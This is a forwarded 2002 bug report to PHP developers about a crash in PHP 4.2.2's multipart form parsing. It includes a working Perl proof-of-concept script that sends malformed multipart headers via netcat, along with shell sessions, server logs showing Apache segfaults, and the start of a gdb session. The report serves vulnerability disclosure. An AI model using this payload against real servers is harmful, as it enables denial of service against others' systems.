-- Forwarded message --
Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
From: Dan Kalowsky [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV
Please send it to [EMAIL PROTECTED]
(Okay, that's easy enough -- I posted this in the web form, but it
wrapped all to hell. Thanks for the email address, Mr. Kalowsky)
Hello. While working on an exploit for the multipart_buffer_headers() hole
that you just fixed, and I found another problem that you might want to
look into. It looks like a DoS only, but there might be a way to execute
arbitrary code and I just haven't found it yet. Credit for the find goes
to myself and members of the [0dd] 0-Day Digest.
Thanks,
Thomas Cannon
---
[root@spoon]# /usr/local/www/bin/apachectl start
/usr/local/www/bin/apachectl start: httpd started
[root@spoon]# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 24 Jul 2002 04:03:49 GMT
Server: Apache/1.3.26 (Unix) PHP/4.2.2
X-Powered-By: PHP/4.2.2
Connection: close
Content-Type: text/html
Connection closed by foreign host.
[root@spoon]# /usr/local/www/bin/httpd -l
Compiled-in modules:
http_core.c
mod_env.c
mod_log_config.c
mod_mime.c
mod_negotiation.c
mod_status.c
mod_include.c
mod_autoindex.c
mod_dir.c
mod_cgi.c
mod_asis.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_access.c
mod_auth.c
mod_setenvif.c
mod_php4.c
suexec: disabled; invalid wrapper /usr/local/www/bin/suexec
[root@spoon]#
/* change over to my remote machine, stereophonic */
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [1]
90464
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [2]
90466
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [3]
90468
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [4]
90470
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80
[tcannon@stereophonic]$ more header.pl
#!/usr/bin/perl
headers();
sub headers {
print POST /vuln/upload.php HTTP/1.0\n;
print Referer: http://www.noops.org\n;;
print Connection: Keep-Alive\n;
print User-Agent: killer-loop.pl\n;
print Host: www.noops.org\n;
print Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*\n;
print Accept-Encoding: gzip\n;
print Accept-Language: en\n;
print Accept-Charset: iso-8859-1,*,utf-8\n;
print Content-type: multipart/form-data; boundary=xnyLAaB03X\n;
print Content-length: 246\n\n\n\n;
print --xnyLAaB03X\n;
print Content-Disposition: form-data; name=.A x 100;
}
/* then back to spoon, the webserver... The 'reviewer' script is a little
thing I whipped up to keep a note of where I last read the apache_log and
error_log from, and it also weeds out the code red and nimda background
noise -- you'd see this same output from 'tail' or a similar utility */
/* NOTE: 5 - 10 minutes need to pass to give apache time to segfault */
[root@spoon]# reviewer
noops.org - - [23/Jul/2002:21:03:49 -0700] HEAD / HTTP/1.0 200 0 - -
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
Now it's the error log...
[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2
configured -- resuming normal operations
[Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock)
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal
Segmentation fault (11)
[root@spoon]# gdb /usr/local/www/bin/httpd 32839
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for
details.
This GDB was configured as i386-unknown-freebsd...
/usr/local/www/conf/32839: No such file or directory.
Attaching to program: /usr/local/www/bin/httpd, process 32839
